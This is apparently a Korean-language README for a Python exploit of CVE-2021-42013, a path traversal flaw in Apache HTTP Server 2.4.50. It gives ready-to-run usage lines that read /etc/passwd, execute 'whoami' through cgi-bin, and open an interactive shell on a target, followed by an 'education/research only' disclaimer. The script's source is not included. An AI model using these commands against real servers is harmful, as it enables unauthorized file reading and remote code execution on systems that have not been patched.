
CVE-2021-42013 - Apache 2.4.50
CVE-2021-42013 - Apache HTTP Server 2.4.50 LFI & RCE를 위한 python3 스크립트입니다. RCE를 사용하려면 cgi-bin이 활성화되어 있어야 합니다.
python3 apache_2.4.50.py -t http://apache.hack/ -lfi /etc/passwd
python3 apache_2.4.50.py -t http://apache.hack/ -rce whoami
python3 apache_2.4.50.py -t http://apache.hack/ -shell
도움말 메뉴를 보려면:
python3 apache_2.4.50.py -h
이 저장소에 제공된 모든 코드는 교육/연구 목적으로만 사용됩니다. 이 저장소에 포함된 자료와 관련된 모든 행동 및/또는 활동은 전적으로 사용자의 책임입니다. 이 저장소의 코드를 오용할 경우 관련자에게 형사 고발이 제기될 수 있습니다. 저자는 이 저장소의 코드를 불법적으로 오용하는 개인에 대해 형사 고발이 제기되는 경우 어떠한 책임도 지지 않습니다.